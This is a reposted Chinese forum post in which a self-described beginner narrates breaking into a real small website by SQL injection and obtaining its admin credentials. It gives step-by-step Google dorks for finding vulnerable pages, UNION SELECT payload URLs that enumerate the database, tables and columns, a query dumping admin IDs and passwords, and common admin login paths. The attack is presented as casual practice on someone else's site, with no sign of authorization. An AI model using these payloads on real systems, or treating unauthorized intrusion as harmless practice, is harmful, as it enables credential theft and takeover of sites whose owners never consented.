设为首页 收藏本站
查看: 1426|回复: 0

[经验分享] 新手学习SQL 注入式***

[复制链接]

尚未签到

发表于 2018-10-19 07:43:56 | 显示全部楼层 |阅读模式
  2天以前,俺对于SQL注入式***仅仅是有个理论的概念,昨天上班无聊,随手搜索了一下相关的文档,做了个小练习,结果成功获取了某小网站的管理员权限,现在分享一下学习心得。
  第一步:搜索可能有漏洞的网站
  Google 是很强大的,之前牛牛的帖子就已经提到了利用google收集信息。这里我们可以搜索的关键词很多,例如:
  inurl:index.php?id=
  inurl:gallery.php?id=
  inurl:article.php?id=
  inurl:pageid=
  网上有个术语,把这些称作“Google Dorks”
  如果想针对某个特定的网站,可以用类似的格式搜索:site: http:// www.victimsite.com  inurl:php?id=
  第二步:检测一下目标是否有明显漏洞
  搜索结果会出来一大堆,一个简单的测试方式是在Url末尾的数字后面加单引号或者加上 and 1=1 或者 1=2 看看界面是否有明显变化或者直接就给出SQL的报错语句了。
  例如http:// www.victimsite.com /index.php?id=2'
  经过5分钟的随意搜索和测试,俺找到一个学习的目标~
  正常界面是这样的,
DSC0000.png

  但是等我输入单引号,同样的界面就变成了
DSC0001.png

  当我加上and 1=2 之后呢变成了
DSC0002.png

  Good!很明显,对于不同的SQL语句有不同的反馈,有门!
  第三步:看看该表有多少个字段
  
  这一步很简单,也容易理解,url后面加上order by number就行了,这个number可以随意输入,一般从小往大的尝试,比如12,3,4,5都能看见网页界面,然后6就报错了,那么很明显这个网页对应的表只有5个字段
  比如当我输入1-4的时候是这个界面
  
DSC0003.png

  输入5就变成了
DSC0004.png

  很好,那说明这个表就只有4个字段。
  第四步:找到有漏洞的字段
  
  如果字段数目是7,那么可以用以下方式,注意数字改成负数
  http://www.victimsite.com/index.php?id=-2union select 1,2,3,4,5,6,7—
  或者
  http://www.victimsite.com/index.php?id=-2and 1=2 union select 1,2,3,4,5,6,7—
  以我的***目标为例
DSC0005.png

  很好,说明字段2有漏洞
  第五步:找到对应的版本号,数据库和用户
  
  把上面的2换成对应的version(),database()和user()即可,例如
  http://www.victimsite.com/index.php?id=-2and 1=2 union select 1,2,version(),4,5,6,7—
  http://www.victimsite.com/index.php?id=-2and 1=2 union select 1,2,database(),4,5,6,7—
  http://www.victimsite.com/index.php?id=-2and 1=2 union select 1,2,user(),4,5,6,7—
  我的执行结果是
DSC0006.png

DSC0007.png

DSC0008.png

  第六步:看看这个数据库下有哪些表
  
  用group_concat(table_name)替换有漏洞的字段,然后后面加frominformation_schema.tables where table_schema=database()
  例如:http://www.victimsite.com/index.php?id=-2 and 1=2 unionselect 1,2,group_concat(table_name),4,5,6,7 from information_schema.tableswhere table_schema=database()—
  执行结果如下:
DSC0009.png

  
  第七步:找到表里的字段名称
  
  把"from information_schema.tables where table_schema=database()--" 替换成"FROMinformation_schema.columns WHERE table_name=mysqlchar—
  然后在firefox上安装一个插件HackBar
  装好以后界面如下
DSC00010.png

  选择Sql->Mysql->MysqlChar(),然后输入你想查询的表名
DSC00011.png

  将生成的结果替换到mysqlchar
  http://www.victimsite.com/index.php?id=-2and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns wheretable_name=CHAR(97, 100,109, 105, 110)--
DSC00012.png

  成功的获取字段名称!
  第八步:查询表获得账户信息
  用group_concat(columnname1,0x3a,anothercolumnname2).来替换之前的字段
  http://www.victimsite.com/index.php?id=-2
  and 1=2 unionselect 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin—
  例如
DSC00013.png

  第九步:找到管理员版面登录
  一般可能在以下地方存在
  http://www.victimsite.com/admin.php
  http://www.victimsite.com/admin/
  http://www.victimsite.com/admin.html
  http://www.victimsite.com:2082/
DSC00014.png

  到此为止,俺的第一个sql注入式***的测试成功~
  转载自beanxyz的博客


运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-623355-1-1.html 上篇帖子: txt转换成sql 下篇帖子: Apache Traffic Server 5.3.2及6.2.1的使用初探索
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表